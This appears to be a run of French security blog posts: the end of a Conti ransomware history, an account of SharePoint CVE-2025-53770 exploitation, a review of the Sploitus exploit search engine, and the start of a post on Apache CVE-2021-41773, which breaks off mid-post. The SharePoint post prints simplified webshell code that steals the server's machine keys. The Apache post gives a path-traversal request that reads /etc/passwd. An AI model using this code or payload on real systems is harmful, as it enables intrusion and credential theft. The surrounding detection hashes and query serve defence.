Et pendant ce temps, c’est business as usual chez Conti. Les fuites qui ont eu lieu après coup en 2022 révèlent des conversations internes absolument surréalistes. On découvre le quotidien banal du crime organisé moderne. “Mango se plaint que son équipe pentest n’est pas assez productive, il demande l’autorisation de virer Tortik”, “Stern veut un rapport détaillé sur les métriques du Q3 avant jeudi”, “Professor organise une formation obligatoire lundi sur les nouvelles techniques d’évasion EDR”, “Le département compta signale un retard dans le paiement des salaires de novembre à cause de la volatilité du Bitcoin”… On se croirait dans les emails corporate de n’importe quelle entreprise, sauf qu’on parle de criminels qui détruisent des vies.

Et leurs problèmes RH sont particulièrement savoureux. Un manager se plaint : “Les devs veulent tous passer sur l’équipe crypto parce que c’est mieux payé, mais j’ai besoin d’eux pour patcher le ransomware !” Un autre : “Bentley a encore raté le daily standup ce matin, c’est la 3ème fois ce mois-ci, on fait quoi ?” Ou encore : “Les nouveaux refusent de bosser le weekend sans prime, c’est n’importe quoi, de mon temps on était motivés !” Y’a même des discussions sur la mise en place d’un système de congés payés et de RTT. Du grand n’importe quoi.

Les documents fuités incluent leur fameux “playbook”, le manuel d’opération intégral donné aux nouveaux affiliés. 435 pages en russe (les fuites contenaient plusieurs versions) qui détaillent absolument tout : Comment utiliser Cobalt Strike (avec une licence crackée fournie), comment identifier les cibles prioritaires dans un Active Directory, les 10 commandements de la négociation de rançon, comment blanchir les bitcoins via Monero, les erreurs de débutant à éviter… C’est tellement détaillé et bien fait qu’un amateur motivé pourrait suivre les instructions et lancer une attaque ransomware professionnelle.

Le playbook révèle également leur arsenal technique complet. Outre l’incontournable Cobalt Strike, on y trouve : Metasploit et Armitage pour l’exploitation, BloodHound et SharpHound pour mapper l’AD, Mimikatz et LaZagne pour les mots de passe, PrintNightmare et ZeroLogon pour l’escalade de privilèges, rclone et WinSCP pour l’exfiltration… Ils ont même développé leurs propres outils custom : ContiLocker (le ransomware), ContiLeaks (pour l’exfil), ContiNegotiator (un chatbot pour les négociations !). Une vraie usine à malwares.

Cobalt Strike 4.3 en version crackée par Conti

Et les vulnérabilités exploitées sont soigneusement cataloguées avec leur niveau de fiabilité. ZeroLogon (CVE-2020-1472) : “Fonctionne dans 95% des cas, privilégier sur les DC Windows 2012-2019”. PrintNightmare (CVE-2021-34527) : “Excellent pour l’escalade locale, attention aux patchs de juillet 2021”. ProxyShell/ProxyLogon : “Cible Exchange, très efficace, permet installation directe du webshell”. EternalBlue (MS17-010) : “Vieux mais gold, encore présent sur 30% des réseaux”. Ils ont même un système de notation des exploits de 1 à 5 étoiles, comme sur Amazon.

Mais ce qui ressort le plus des fuites, c’est aussi cet aspect “corporate dystopique” de l’organisation. Les discussions sur les augmentations de salaire ("Rescator mérite ses 8000$/mois, il a ramené 3 grosses victimes ce trimestre"), les formations obligatoires ("Rappel : webinar sur OPSEC jeudi 15h heure de Moscou, présence obligatoire"), les conflits entre équipes ("L’équipe de Baget refuse de partager ses accès avec nous, c’est du sabotage"), les réorganisations ("Suite au départ de Tramp, fusion des équipes Pentest-1 et Pentest-3")… C’est The Office version cybercrime.

Y’a même des discussions hallucinantes sur la “culture d’entreprise”. Un manager RH propose d’organiser des “team buildings virtuels” pour améliorer la cohésion. Un autre suggère de créer un channel #random sur Jabber pour que les employés puissent “socialiser” et parler d’autre chose que de crime. Quelqu’un propose même d’organiser un tournoi de CS:GO inter-équipes. “Ça renforcera l’esprit de compétition saine”, dit-il. On croit rêver…

Mais tout ce bel édifice criminel va s’effondrer comme un château de cartes le 25 février 2022 car ce jour-là, c’est le lendemain de l’invasion russe en Ukraine, et Conti commet l’erreur fatale qui va signer son arrêt de mort. Ils publient sur leur site un communiqué de soutien inconditionnel à la Russie : “Le groupe Conti annonce officiellement son soutien total au gouvernement russe. Si quelqu’un décide d’organiser une cyberattaque ou toute activité de guerre contre la Russie, nous utiliserons toutes nos ressources pour riposter sur les infrastructures critiques de l’ennemi.”

En une phrase, ils viennent de politiser leur business et de se mettre une cible géante sur le dos.

Et la réaction ne se fait pas attendre puisque le 27 février, à peine 48 heures plus tard, un compte Twitter anonyme @ContiLeaks commence à balancer. Et pas qu’un peu. Le leaker signe chaque message “Slava Ukraini!” (Gloire à l’Ukraine). Il s’agit d’un membre ukrainien du groupe, révolté par la prise de position pro-Kremlin, qui décide alors de tout balancer. Un véritable Snowden du crime organisé. Et il a accès à TOUT.

L’ampleur de la fuite est absolument monumentale. 60 694 messages internes, soit 393 fichiers JSON compressés. Des conversations qui s’étalent de janvier 2021 à février 2022. Plus de 100 000 fichiers au total incluant le code source, les manuels, les outils, les bitcoins wallets, les vrais noms… C’est Wikileaks puissance 10. Les experts en sécurité parlent immédiatement des “Panama Papers du ransomware”. Jamais dans l’histoire du cybercrime on n’avait eu accès à autant d’informations internes sur un groupe criminel en activité.

ContiLeaks : quand 60 000 messages privés deviennent publics

Et les révélations sont absolument explosives. On découvre par exemple les liens avec le FSB russe (une conversation d’avril 2021 mentionne explicitement un financement FSB et leur intérêt pour des documents Bellingcat sur Navalny). On apprend les vrais noms derrière les pseudos. Les montants exacts des rançons (2,7 millions payés par Broward County, 1,1 million par Advantech, 5,5 millions par JBS…). Les disputes internes ("Pumba a volé 50k$ de la cagnotte commune", “Target refuse de payer sa part au développeur”). Les techniques secrètes. Les victimes non déclarées et les projets futurs, notamment qu’ils préparaient “Conti 2.0” avec des capacités de ver auto-réplicant. Un trésor pour les enquêteurs.

On découvre aussi des anecdotes croustillantes qui montrent le côté humain (si on peut dire) de ces criminels. Un membre se plaint d’avoir touché seulement 15 000 dollars pour une attaque qui a rapporté 2 millions ("C’est de l’exploitation !" dit-il). Un autre raconte comment il a failli se faire griller par sa femme qui a trouvé bizarre ses horaires décalés et ses revenus inexpliqués. Un troisième demande des conseils fiscaux : “Comment je déclare 500k$ de gains crypto sans me faire gauler ?” Les réponses sont hilarantes : “Dis que t’as investi dans le Dogecoin mdr”.

Les fuites révèlent également l’ampleur financière vertigineuse de l’opération. En 2021 uniquement, Conti a généré 180 millions de dollars de revenus bruts. Les analyses blockchain des wallets exposés montrent des mouvements de fonds massifs. Un transfert de 85 000 dollars de “Stern” vers “Mango” pour payer les salaires de décembre. 2,3 millions transférés vers un mixer Monero en une seule transaction. Des dizaines de wallets avec des soldes à 6 ou 7 chiffres. La fortune totale du groupe est estimée à plus de 2 milliards de dollars en crypto au moment des fuites.

Les analystes découvrent que ces 180 millions se répartissent ainsi : environ 30% (54 millions) pour le “core team” Conti, 70% (126 millions) redistribués aux affiliés et employés. Mais attention, c’est du brut. Après les coûts opérationnels (infrastructures, corruption, blanchiment qui coûte 20-30%), le profit net du groupe tourne autour de 30-40 millions par an. Pas mal pour une “startup” criminelle de 150 personnes.

Malgré l’hémorragie des fuites, Conti tente alors de continuer. Le leaker ukrainien publie de nouvelles conversations “fraîches” en mars, montrant la panique interne. Les membres s’accusent mutuellement d’être la taupe, la paranoïa explose. “C’est forcément quelqu’un du département négociation”, “Non, ça vient de l’équipe dev, ils ont accès à tout”, “Je parie sur ce fdp de Hardy, il a toujours été louche”. Certains membres clés disparaissent du jour au lendemain. L’ambiance devient toxique, irrespirable.

Les autorités mondiales profitent alors de ce chaos pour resserrer l’étau et le 10 février 2023, les États-Unis et le Royaume-Uni frappent fort avec des sanctions contre 7 Russes identifiés grâce aux fuites : Gel des avoirs, interdiction de transactions, inscription sur les listes noires internationales. Les banques crypto commencent à bloquer les adresses liées à Conti. Même les exchangers louches du darknet refusent de toucher à leurs bitcoins. La pression devient insoutenable.

Et le 19 mai 2022, c’est fini. Les sites de Conti disparaissent d’Internet. Le blog “wall of shame” qui listait les cibles, le site de négociation, les serveurs C2, toute l’infrastructure publique s’évanouit en quelques heures. Le leader du chat interne poste un dernier message : “C’était un honneur de servir avec vous. Bonne chance pour la suite.” Puis plus rien. Après deux ans et demi d’activité, après avoir généré des centaines de millions et causé des milliards de dégâts, le rideau tombe sur Conti. Une chute spectaculaire pour celui qui fut le roi incontesté du ransomware.

Mais est-ce vraiment la fin ? Les experts sont unanimes : Non.

Wizard Spider n’a pas disparu, il s’est juste dispersé façon puzzle. En effet, des analyses post-mortem suggèrent que Conti s’est fragmenté en au moins une dizaine de nouveaux groupes. Black Basta (qui cartonne depuis mi-2022), Royal/BlackSuit, Karakurt, BlackByte, et d’autres opérations sans nom. C’est l’hydre de la mythologie… tu coupes une tête, dix repoussent. Sauf qu’au lieu d’une organisation centralisée, on a maintenant une constellation de groupes autonomes, plus petits, plus agiles, plus difficiles à traquer.

Les anciens de Conti ont aussi essaimé dans l’écosystème criminel global. On retrouve leurs techniques, leurs outils, leur philosophie dans des dizaines d’autres opérations. LockBit a recruté plusieurs ex-Conti. ALPHV/BlackCat compte d’anciens négociateurs Conti dans ses rangs. Le playbook Conti est devenu la bible du ransomware moderne, téléchargé et étudié par tous les apprentis cybercriminels. L’héritage de Conti vit, se transforme, mute. Comme un virus.

Quant à Vitaly Kovalev, le mystérieux cerveau derrière toute l’opération ? Et bien il court toujours. Les autorités allemandes ont confirmé son identité en 2024 et estiment qu’il vit quelque part entre Moscou et Saint-Pétersbourg. Avec sa fortune en crypto estimée à 500 millions de dollars minimum (probablement plus proche du milliard aujourd’hui avec la hausse du Bitcoin), il a les moyens de rester planqué très longtemps. Nouveaux papiers, chirurgie esthétique, protection rapprochée, résidences multiples… La Russie n’extradant pas ses citoyens, surtout quand ils ont possiblement des liens avec les services, alors Kovalev peut dormir tranquille. Pour l’instant.

Moscou - Le refuge doré des cybercriminels milliardaires

Du coup, qu’est-ce qu’on retient de cette histoire de dingue ?

D’abord, le cybercrime s’est professionnalisé à un niveau qu’on n’imaginait même pas. Ces groupes fonctionnent exactement comme des multinationales, avec leurs process, leurs KPIs et leurs départements spécialisés. Mais le plus inquiétant, c’est qu’ils se politisent… ils prennent position dans des guerres, menacent de renverser des gouvernements démocratiques et entretiennent des liens avec les services de renseignement. On est passé du simple banditisme numérique à une forme de guerre hybride où les criminels deviennent des mercenaires numériques.

Les dommages causés par Conti donnent également le vertige. On parle de minimum 2 milliards de dollars en dégâts directs, mais si on ajoute l’indirect, on monte facilement à 10 milliards. Des hôpitaux ont été paralysés, des PME ont mis la clé sous la porte, des infrastructures critiques ont été fragilisées. L’impact va bien au-delà du financier. Et le modèle RaaS qu’ils ont perfectionné a complètement changé la donne. Aujourd’hui, n’importe quel apprenti hacker peut louer un ransomware sur le darknet et lancer des attaques. C’est l’uberisation totale du cybercrime, et cette accessibilité fait froid dans le dos.

Heureusement, les entreprises ont tiré des leçons. Les budgets cybersécurité ont explosé, dépassant les 200 milliards en 2024, et les bonnes pratiques comme les sauvegardes 3-2-1 se généralisent. Mais c’est une course sans fin car les nouveaux groupes issus de Conti utilisent déjà l’IA, achètent des 0-days et corrompent des employés en interne.

Paradoxalement, les fuites de Conti ont aussi été une aubaine pour la communauté InfoSec car pour la première fois, on a pu étudier de l’intérieur le fonctionnement d’un gang majeur de cybercriminels, ce qui a permis de développer de nouvelles défenses et de procéder à plusieurs arrestations. Mais ces fuites ont aussi révélé la fragilité de ces empires criminels : un seul membre mécontent et une déclaration politique mal placée ont suffi à faire s’écrouler toute l’organisation.

L’histoire de Conti restera comme le moment où des hackers anarchistes sont devenus des businessmen, où le ransomware est passé de l’artisanat à l’industrie lourde, et où la cybercriminalité s’est dangereusement mêlée de géopolitique. Et pendant ce temps, Stern sirote probablement un cocktail sur une plage de Sotchi, consultant le cours de ses +500 millions en crypto tout en se moquant de ceux qui le cherchent encore. Le crime paie, très bien même. Du moins, tant qu’on évite de tweeter son soutien à Poutine.

Alors la prochaine fois que votre équipe IT vous tanne pour une mise à jour, souvenez-vous qu’il existe des organisations criminelles avec des centaines d’employés et des millions en R&D, dont le seul but est de transformer votre infrastructure en machine à bitcoins.

Sources : Wikipedia - Conti ransomware, BleepingComputer - Conti leaks, Krebs on Security - Conti Diaries, The DFIR Report - Conti Analysis, CISA - Conti Alert, Heimdal Security - All about Conti, Rapid7 - ContiLeaks Analysis, Flashpoint - History of Conti, Global Initiative - Rise and Fall of Conti, Istari - Costa Rica Attacks

Allez, même si tous les médias vous gavent avec ça ces derniers jours, je vais quand même vous raconter l’histoire de la CVE-2025-53770, une faille SharePoint qui fait actuellement trembler Internet.

On est le 18 juillet dernier, c’est vendredi matin. Je suis tranquille posé en Bretagne, devant mon petit café, en train de scroller mes flux RSS comme d’hab. Et là, BAM ! Je vois un tweet d’un chercheur néerlandais qui me fait recracher mon café : “Quelque chose de très mauvais se passe avec SharePoint. Vérifiez vos logs. MAINTENANT.”

Du coup, je me dis “encore un qui a fumé la moquette”. Mais non. C’était le début d’une histoire qui commence avec un mec vietnamien super balèze, qui continue avec des hackers chinois vénères, et qui se finit avec des milliers d’entreprises qui chialent…

Mais pour vraiment comprendre ce bordel actuel, faut qu’on remonte le temps. Direction Berlin, mai 2025 pour le Pwn2Own. Cet événement, c’est LE truc où les meilleurs hackers du monde viennent casser du code pour de la thune. Les Jeux Olympiques du hacking si vous préférez, mais en plus stylé et sans le dopage. Dans la salle bondée, y’a un jeune vietnamien qui se pointe avec son laptop tout pourri. Son nom est Dinh Ho Anh Khoa, alias @_l0gg sur Twitter.

Le mec bosse pour Viettel Cyber Security, et c’est pas son premier rodéo mais cette fois, il a un truc de malade dans sa besace. Pendant des mois, ce génie a étudié SharePoint, vous savez, le machin de Microsoft que toutes les boîtes utilisent pour stocker leurs docs et faire semblant d’être organisées.

Et là, attention les yeux, en quelques minutes, Khoa déboîte complètement un serveur SharePoint. Sans mot de passe, sans rien. Juste avec UNE SEULE requête HTTP. Mdr ! Le jury n’en peut plus, et les autres participants sont sur le cul.

Comment a-t-il fait ? Et bien c’est simple (enfin, façon de parler). Il enchaîne deux bugs :

• Le premier (CVE-2025-49706) qui dit “Salut SharePoint, c’est moi ton admin, laisse-moi passer” et SharePoint le croit !
• Le second (CVE-2025-49704) qui permet d’écrire des fichiers où on veut sur le serveur

Résultat des courses, 100 000 dollars dans la popoche, 10 points Master of Pwn, et une standing ovation !! L’équipe Viettel finit alors avec un score parfait de 15,5/15,5. Ils sont deuxièmes au général, mais franchement, c’est la classe.

Plus tard, Khoa tweete avec la modestie d’un champion : “L’exploit nécessite une seule requête. Je l’appellerais ToolShell, ZDI a dit que l’endpoint était /ToolPane après tout.” Le mec vient de péter SharePoint et il fait des jeux de mots. J’adore.

SharePoint en PLS face à l’exploit de Khoa

Bon, maintenant on fait un petit saut dans le temps. On est le 14 juillet et Microsoft a sorti des patchs pour ces deux vulnérabilités. Tout le monde pense que c’est réglé. Spoiler alert : c’est pas réglé du tout.

Dans les bureaux de Code White GmbH en Allemagne, l’ambiance est électrique car les mecs viennent de faire un truc de ouf ! Ils ont reproduit l’exploit de Khoa et pas qu’un peu !

“Nous avons reproduit ‘ToolShell’, la chaîne d’exploit non authentifiée pour CVE-2025-49706 + CVE-2025-49704 utilisée par @_l0gg pour faire tomber SharePoint à #Pwn2Own Berlin 2025, c’est vraiment juste une requête !”, postent-ils sur Twitter, tout fiers.

Sauf que voilà, Code White c’est des gentils, mais dans l’ombre, y’a des méchants qui prennent des notes. Et eux, ils ne vont pas se contenter de twitter leur exploit…

Amsterdam, 18 juillet, 20h47. Les mecs d’Eye Security, une boîte néerlandaise spécialisée dans la détection de menaces, sont en train de surveiller Internet (ouais, c’est leur taf, surveiller TOUT Internet…). Un de leurs analystes lève la tête de son écran : “Euh les gars, j’ai des centaines de requêtes POST bizarres vers /layouts/15/ToolPane.aspx sur plein de serveurs SharePoint différents. Et le header Referer c’est /layouts/SignOut.aspx. C’est complètement con comme truc.”

Bah oui c’est con. Personne ne se déconnecte via ToolPane. C’est comme si on passait par la fenêtre pour sortir de chez soit alors que la porte est ouverte. Sauf que là, c’est pas pour sortir, c’est pour rentrer…

L’équipe d’Eye Security vient alors de découvrir en live une des plus grosses campagnes de cyberattaque de l’histoire. Ce qu’ils voient, c’est l’exploitation d’une NOUVELLE vulnérabilité zero-day : la CVE-2025-53770. Les hackers ont trouvé comment contourner les patchs de Microsoft. C’est un game over total.

Les chercheurs bossent alors toute la nuit comme des malades. Ils scannent plus de 8000 serveurs SharePoint dans le monde et le constat est terrifiant :

• 17 juillet, 12h51 UTC : Première vague depuis 96.9.125.147 (des tests apparemment)
• 18 juillet, 18h06 UTC : LA GROSSE VAGUE depuis 107.191.58.76 (ça cartonne sévère)
• 19 juillet, 07h28 UTC : Rebelote depuis 104.238.159.149

“C’était comme regarder un tsunami en temps réel”, racontera quelques jours plus tard un chercheur. “On voyait des dizaines de serveurs tomber toutes les heures. Et on pouvait rien faire à part regarder et prendre des notes.”

Mais alors qu’est-ce que les hackers déploient sur ces serveurs ? Et bien un truc très vicieux nommé spinstall0.aspx. Derrière ce nom tout pourri se cache une backdoor d’une ingéniosité diabolique car contrairement aux web shells classiques qui vous permettent d’exécuter des commandes (genre “del C:*.*” pour les nostalgiques du DOS), spinstall0.aspx n’a qu’UN SEUL but : voler les clés cryptographiques du serveur SharePoint.

Pour les non-techos, j’vous explique. Les clés crypto de SharePoint, c’est comme le moule pour fabriquer un pass pour votre immeuble. Une fois que vous avez le moule de ce pass, vous pouvez faire autant de doubles que vous voulez et même si le proprio d’un appart change sa serrure, vous avez toujours le moule pour faire des pass, donc vous pouvez l’ouvrir.

Techniquement, ça ressemble à ça (version simplifiée pour pas vous faire peur) :

// spinstall0.aspx - Le cauchemar de tout admin SharePoint
using System.Web;
using System.Reflection;
// On charge les trucs secrets de Windows
Assembly assembly = Assembly.Load("System.Web");
// On utilise la magie noire de la réflexion .NET
MethodInfo getConfig = assembly.GetType("System.Web.Configuration.MachineKeySection")
.GetMethod("GetApplicationConfig", BindingFlags.NonPublic | BindingFlags.Static);
// On pique les clés crypto
MachineKeySection config = (MachineKeySection)getConfig.Invoke(null, null);
// Et hop, on les affiche tranquille
Response.Write("ValidationKey: " + config.ValidationKey);
Response.Write("DecryptionKey: " + config.DecryptionKey);
// Bisous, on se revoit plus tard avec vos clés ;)

Les chercheurs de Check Point ont identifié les signatures SHA256 du malware (pour ceux qui veulent jouer aux détectives) :

• 92bb4ddb98eeaf11fc15bb32e71d0a63256a0ed826a03ba293ce3a8bf057a514
• 27c45b8ed7b8a7e5fff473b50c24028bd028a9fe8e25e5cea2bf5e676e531014
• 8d3d3f3a17d233bc8562765e61f7314ca7a08130ac0fb153ffd091612920b0f2

Et le fichier est généralement planqué ici :

C:\PROGRA~1\COMMON~1\MICROS~1\WEBSER~1\16\TEMPLATE\LAYOUTS\spinstall0.aspx

Hé oui, ils utilisent encore les noms courts DOS. En 2025, c’est ça le niveau expert !

22 juillet, Redmond, Washington. Vous vous en doutez, chez Microsoft c’est la panique totale. Le MSRC (Microsoft Security Response Center) est en mode DEFCON 1 et les mecs dorment plus et ne mangent plus…non, ils codent et analysent H24 tout ce qui se passe.

Et là, les analystes du Microsoft Threat Intelligence font une découverte qui fout les jetons… Ce ne sont pas des script kiddies qui attaquent. C’est carrément des groupes étatiques chinois. Du lourd. Du très lourd.

Microsoft identifie ainsi 3 acteurs principaux (ils leur donnent des noms de typhons, c’est plus classe que “Hacker Chinois N°3”) :

Linen Typhoon (alias APT27 ou Emissary Panda) : Ces mecs sont dans le game depuis 2012 et leur spécialité c’est de voler de la propriété intellectuelle. Ils adorent taper dans les ambassades et les organisations gouvernementales. Bref, ils veulent savoir ce que tout le monde mijote.

Violet Typhoon : Apparus en 2015, ces gars ciblent les anciens militaires, les ONG, les think tanks et les universités. Et leur kiff c’est de collecter du renseignement. Ils veulent savoir qui pense quoi et qui fait quoi.

Storm-2603 : Ce sont les plus mystérieux du lot. Basés en Chine mais sans liens connus avec d’autres groupes, ces mecs déploient parfois des ransomwares Warlock et Lockbit. Il sont mi-espions, mi-rançonneurs. Dans le pire des deux mondes, quoi.

“C’est la première fois qu’on voit 3 groupes d’État-nation différents exploiter la même zero-day en même temps”, confie un analyste Microsoft. “D’habitude ils se marchent sur les pieds, là ils étaient coordonnés. C’est flippant.”

19 juillet, minuit. Chez Microsoft c’est toujours la course contre la montre car chaque heure qui passe, c’est des dizaines de nouveaux serveurs pwned. La pression est énorme. Les devs sont s, les managers pètent des câbles, et le PDG appelle toutes les heures. Le problème est complexe car la CVE-2025-53770 c’est pas juste un bug, c’est un contournement des patchs précédents.

L’équipe SharePoint bosse alors sur plusieurs fronts :

1. Comprendre comment le contournement fonctionne (spoiler : c’est tordu)
2. Développer un patch qui ne peut pas être contourné (cette fois promis juré ^^)
3. Tester sur TOUTES les versions de SharePoint (y’en a un paquet !)
4. Et préparer la doc et les outils (parce que personne lit jamais la doc mais bon…)

Mais pendant ce temps, les chiffres des compromissions explosent. The Washington Post rapporte que des agences fédérales US, des compagnies énergétiques, des universités prestigieuses et même des opérateurs télécom asiatiques se sont fait avoir. C’est le carnage total !!

20 juillet, dimanche matin. Microsoft fait un truc qu’ils ne font jamais : sortir des patchs un dimanche. Mais là c’est la guerre, alors il faut agir vite.

Et ils balancent tout d’un coup :

• Un advisory officiel qui explique le bordel
• Des patchs d’urgence pour toutes les versions (même les vieilles que personne devrait plus utiliser)
• Une requête KQL pour détecter le malware dans Microsoft 365 Defender

Voici la requête KQL pour les curieux :

DeviceFileEvents 
| where FolderPath has "MICROS~1\\WEBSER~1\\16\\TEMPLATE\\LAYOUTS" 
| where FileName =~ "spinstall0.aspx" or FileName has "spinstall0"
| project Timestamp, DeviceName, InitiatingProcessFileName, 
InitiatingProcessCommandLine, FileName, FolderPath, 
ReportId, ActionType, SHA256
| order by Timestamp desc
// Si ça retourne des résultats, vous êtes dans la mouise

Mais Microsoft va plus loin car dans leur advisory, ils lâchent une bombe : “Appliquer les patches ne suffit pas. Vous DEVEZ changer vos clés ASP.NET et redémarrer IIS.”

Traduction : même si vous patchez, si les hackers ont déjà volé vos clés, vous êtes toujours dans la merde. Il faut donc tout changer… Les serrures ET les clés.

Le même jour, la CISA américaine ajoute la CVE-2025-53770 à sa liste des vulnérabilités activement exploitées. Les agences fédérales ont alors 24h pour patcher. Pour une administration, c’est comme demander à un escargot de courir un 100m. Et puis surtout c’est trop tard car le 21 juillet, des proof-of-concept apparaissent sur GitHub. N’importe quel gamin avec 2 neurones peut maintenant exploiter la faille. C’est Noël pour les script kiddies.

SentinelOne rapporte même que leurs honeypots (des faux serveurs pour attraper les hackers) détectent des MILLIERS de tentatives par heure. C’est l’apocalypse numérique. SOCRadar balance aussi des chiffres qui font mal. Et un simple scan Shodan révèle l’exposition mondiale :

• États-Unis : 3 960 serveurs exposés (champions du monde !)
• Iran : 2 488 serveurs (même sous sanctions ils ont SharePoint)
• Malaisie : 1 445 serveurs (la surprise du chef)
• Pays-Bas : 759 serveurs (ils hébergent tout le monde)
• Irlande : 645 serveurs (les datacenters européens)

Au total, plus de 16 000 serveurs SharePoint sont exposés sur Internet et 8 000 sont vulnérables. Des banques, des hôpitaux, des gouvernements… Tout le monde y passe. Rapid7 sort également une analyse qui fait froid dans le dos : certaines organisations se sont fait compromettre en moins de 4 MINUTES après exposition. 4 minutes ! C’est le temps de se faire un café et boom, c’est hacké.

Alors qu’est-ce qu’on retient de ce bordel monumental ? Et bien plusieurs trucs importants :

1. La vitesse, c’est la vie : Entre le PoC de Code White (14 juillet) et l’exploitation massive (17 juillet), y’a que 3 jours. Dans le monde moderne, on n’a pas des semaines pour patcher. Ce sont des heures, max.
2. Les hackers innovent car voler les clés crypto au lieu d’installer un shell, c’est très malin. Ça montre que les attaquants pensent long terme car ils ne veulent pas juste entrer, ils veulent rester.
3. C’est de la géopolitique cyber car 3 groupes chinois qui bossent ensemble c’est du jamais vu encore. Le cyberespace est devenu un vrai champ de bataille entre les nations et nous, les couillons, on est au milieu.
4. Et surtout, les patchs c’est pas magique : La CVE-2025-53770 était un contournement des patchs précédents ce qui montre qu’installer les mises à jour c’est bien, mais c’est pas suffisant. Il faut aussi une défense en profondeur à savoir des patchs + du monitoring + de la segmentation + de nombreuses prières.

Et l’histoire n’est pas finie car pendant que j’écris ces lignes, des milliers d’organisations vérifient leurs logs en mode panique. Elles appliquent les patchs, changent leurs clés, et prient pour pas être dans la liste des victimes. Dinh Ho Anh Khoa, notre hacker vietnamien du début a même déclaré : “J’aurais jamais imaginé que ma découverte aurait de telles conséquences. Mon but c’était d’améliorer la sécurité, pas de déclencher une cyberguerre mondiale.”

Te tracasse pas trop mon gars, ça aurait fini par arriver de toute manière… Là au moins, on est au courant. Et surtout Microsoft a annoncé des changements majeurs dans SharePoint : Plus d’audits, une meilleure séparation des privilèges, et tout le tralala. On verra si ça suffit pour la prochaine fois.

Voilà, c’est ça Internet… On est tous connectés pour le meilleur et surtout pour le pire… Donc si vous bossez dans l’IT et que vous avez SharePoint, allez vérifier vos logs. Genre maintenant hein. Tout de suite là. Et changez vos clés crypto aussi. On sait jamais.

À bon entendeur !

Sources : The Hacker News - Microsoft Links Ongoing SharePoint Exploits to China State Actors, The Hacker News - CISA Orders Urgent Patching After SharePoint Zero-Day, Microsoft Security Blog - Disrupting Active Exploitation, Eye Security - SharePoint Under Siege, MSRC - Customer Guidance, CISA - CVE-2025-53770 Added to Catalog

Si vous bossez dans la sécu ou que vous êtes juste curieux de comprendre comment fonctionnent les vulnérabilités, je vais vous parler d’un outil qui va vous changer la vie : Sploitus. C’est comme Google mais pour trouver des exploits sécu et avec un crâne-pieuvre en logo.

Créé par Anton “Bo0om” Lopanitsyn, un chercheur en sécurité web basé à Moscou, Sploitus est devenu LA référence pour trouver rapidement des exploits, des proof-of-concepts et des outils de hacking. Le site indexe en temps réel tout ce qui sort dans le domaine de la sécurité offensive et ça, c’est vraiment pratique quand vous devez vérifier si un système est vulnérable.

Sur sploitus.com, vous avez une barre de recherche toute simple dans laquelle vous pouvez chercher par nom de logiciel, par CVE (Common Vulnerabilities and Exposures), par type d’exploit ou même par auteur. Et le moteur va alors fouiller dans sa base de données massive et vous sortir tous les exploits pertinents.

Ce qui est cool avec Sploitus, c’est qu’il agrège plusieurs sources. On y trouve des exploits venant d’Exploit-DB, de GitHub, de Packet Storm, et plein d’autres plateformes. Comme ça au lieu de perdre du temps à chercher sur 15 sites différents, vous avez tout centralisé au même endroit et cerise sur le gâteau, les résultats sont triables par date ou par score de pertinence.

Pour chaque exploit, vous avez donc accès à pas mal d’infos utiles : la description détaillée, le code source (quand il est dispo), les plateformes affectées, et surtout un lien vers la source originale. C’est super important ça, parce que vous pouvez vérifier l’authenticité de l’exploit et voir s’il y a des mises à jour ou des commentaires de la communauté.

Le site propose aussi des flux RSS et Atom si vous voulez suivre en temps réel les nouveaux exploits qui sortent. C’est donc super pratique si comme moi, vous faites de la veille techno ou pour surveiller les vulnérabilités qui touchent vos systèmes. Y’a même un mode sombre pour ceux qui préfèrent coder la nuit (ou qui veulent juste faire plus hacker ^^).

Ah et petit détail sympa, des développeurs ont créé des scripts Python pour interroger Sploitus en ligne de commande. Le projet sploitus-search sur GitHub permet par exemple d’intégrer les recherches Sploitus directement dans vos outils de pentest. C’est super pratique par exemple pendant les CTF ou les audits de sécurité.

Maintenant, parlons un peu de l’aspect légal et éthique, parce que c’est aussi très important. Sploitus a eu par le passé quelques soucis avec des plaintes DMCA, notamment concernant un exploit WordPress, mais globalement, le site reste dans la légalité en tant que moteur de recherche qui indexe du contenu public.

CEPENDANT, les exploits référencés sur Sploitus sont des outils puissants qui peuvent causer des dégâts considérables s’ils sont mal utilisés. L’utilisation de ces exploits sur des systèmes dont vous n’êtes pas propriétaire ou sans autorisation explicite est illégale et peut vous valoir de sérieux problèmes judiciaires. Et ne comptez pas sur moi pour vous apporter des oranges en prison !

Ces outils sont donc destinés aux professionnels de la sécurité pour :

• Tester la sécurité de leurs propres systèmes
• Effectuer des audits autorisés
• Comprendre les vulnérabilités pour mieux s’en protéger
• Faire de la recherche en sécurité informatique

Voilà, donc si vous débutez dans le domaine, je vous conseille fortement de vous former d’abord aux bases de la sécurité informatique et de toujours travailler dans un environnement de test isolé.

D’ailleurs, Sploitus n’est pas le seul dans son genre. Vous avez aussi Exploit-DB qui propose SearchSploit en ligne de commande pour les recherches hors ligne, ou encore la base de données CVE officielle du MITRE. Mais l’avantage de Sploitus, c’est vraiment cette agrégation de sources multiples et cette interface web simple et efficace.

Voilà… Et n’oubliez jamais que le but de ce genre d’outils, c’est de sécuriser les systèmes, pas de les compromettre.

Bon, si vous tournez encore sur du Apache 2.4.49 en 2025, j’ai une mauvaise nouvelle : des hackers utilisent probablement votre serveur pour miner du Monero depuis 4 ans et vous ne le savez même pas.

L’histoire commence avec la CVE-2021-41773, une faille de type “path traversal” dans Apache HTTP Server qui permet aux attaquants de naviguer dans l’arborescence de votre serveur comme s’ils étaient chez eux. Cette vulnérabilité a évidemment été patchée en octobre 2021 avec la version 2.4.51 mais on est en juillet 2025, et visiblement, y’a encore du monde qui n’a pas eu le mémo.

Les cybercriminels derrière cette campagne déploient actuellement un cryptominer baptisé Linuxsys. Pour ce faire, ils scannent le net à la recherche de serveurs Apache vulnérables, exploitent la faille pour y déposer leur miner, et hop, votre serveur se met à bosser pour eux.

Le truc marrant (enfin, façon de parler), c’est que cette opération rapporte des cacahuètes car d’après les analyses, le wallet des hackers reçoit environ 0,024 XMR par jour, soit à peu près 8 dollars. C’est le SMIC du cryptomining illégal… Mais bon, quand vous avez 400 serveurs qui bossent pour vous H24, ça finit par faire un petit pécule.

Techniquement, la faille CVE-2021-41773 permet donc de contourner les protections mises en place par Apache pour empêcher l’accès aux fichiers sensibles. En gros, au lieu de taper “../../../etc/passwd” (ce que Apache bloque), les attaquants encodent le deuxième point en “.%2e” et bim, ça passe. C’est con mais ça marche.

Voici à quoi ressemble une attaque typique :

GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1

